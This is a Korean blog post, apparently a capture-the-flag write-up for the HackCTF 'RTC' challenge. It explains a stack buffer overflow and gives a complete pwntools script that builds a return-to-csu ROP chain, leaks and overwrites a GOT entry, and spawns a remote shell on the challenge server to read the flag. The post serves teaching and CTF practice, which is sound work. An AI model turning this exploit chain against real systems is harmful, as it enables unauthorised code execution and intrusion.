본문 바로가기
CTF_Write_UP/HackCTF

[HackCTF] RTC

PowerCo3e_LCH 2019. 10. 12. 20:23

 

시작

안녕하세요 :D

이번엔 유명하고 유명한 Return to csu 문제에요.

너무 많이 쓴 기법이라 눈 감고도 칠 수 있을 정도네요 ㅎㅎ

시작해보죠!!

Write UP

   0x000000000040061c <+38>:    mov    edx,0x15
   0x0000000000400621 <+43>:    mov    esi,0x4006e4
   0x0000000000400626 <+48>:    mov    edi,0x1
   0x000000000040062b <+53>:    mov    eax,0x0
   0x0000000000400630 <+58>:    call   0x4004b0 <write@plt>
   0x0000000000400635 <+63>:    lea    rax,[rbp-0x40]
   0x0000000000400639 <+67>:    mov    edx,0x200
   0x000000000040063e <+72>:    mov    rsi,rax
   0x0000000000400641 <+75>:    mov    edi,0x0
   0x0000000000400646 <+80>:    mov    eax,0x0
   0x000000000040064b <+85>:    call   0x4004c0 <read@plt>
   0x0000000000400650 <+90>:    nop
   0x0000000000400651 <+91>:    leave
   0x0000000000400652 <+92>:    ret
End of assembler dump.

ropasaurusrex 에서 봤던 read(), write() 바이너리네요. read()에서 BOF 터지는 것 까지 똑같습니다 ㅋㅋ

문제 이름부터 RTC인거 보면, rdx 가젯이 없어서 csu로 돌려 푸는 문제인걸 유추할 수 있어요.

return to csu에 대한 설명은 많이 했으니.. 바로 코드로 가겠습니다.

from pwn import *

#context.log_level = "debug"

#p = process("./rtc")
p = remote("ctf.j0n9hyun.xyz", 3025)

payload = ""

read_got = 0x601020
write_got = 0x601018
csu0 = 0x4006b6
csu1 = 0x4006a0
offset = 0x2ab40
bss = 0x601050 + 0x100

p.recvuntil("?\n")

payload += "A" * 72
payload += p64(csu0)

payload += "A" * 8
payload += p64(0)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(bss)
payload += p64(0)
payload += p64(csu1)

payload += "A" * 8
payload += p64(0)
payload += p64(1)
payload += p64(write_got)
payload += p64(8)
payload += p64(write_got)
payload += p64(1)
payload += p64(csu1)

payload += "A" * 8
payload += p64(0)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_got)
payload += p64(0)
payload += p64(csu1)

payload += "A" * 8
payload += p64(0)
payload += p64(1)
payload += p64(write_got)
payload += p64(0)
payload += p64(0)
payload += p64(bss)
payload += p64(csu1)

p.send(payload)

p.send("/bin/sh\x00")

write_addr = u64(p.recv(8))
log.info("write_addr = " + str(hex(write_addr)))

execve_addr = write_addr - offset
log.info("execve_addr = " + str(hex(execve_addr)))

p.send(p64(execve_addr))

p.interactive()

[+] Opening connection to ctf.j0n9hyun.xyz on port 3025: Done
[*] write_addr = 0x7f4e05cbc2b0
[*] execve_addr = 0x7f4e05c91770
[*] Switching to interactive mode
$ ls
flag
main
$ cat flag
// flag!!!

Exploit!!

마무리

350점에서 이렇게 쉬운 문제라니.. 빠르게 넘어가겠습니다 ㅎㅎ

감사합니다 :D

 

'CTF_Write_UP > HackCTF' 카테고리의 다른 글

[HackCTF] World Best Encryption Tool  (0) 2019.10.22
[HackCTF] Register  (0) 2019.10.15
[HackCTF] SysROP  (0) 2019.10.12
[HackCTF] Unexploitable #1  (0) 2019.10.10
[HackCTF] UAF  (0) 2019.09.26

'CTF_Write_UP/HackCTF' Related Articles

티스토리툴바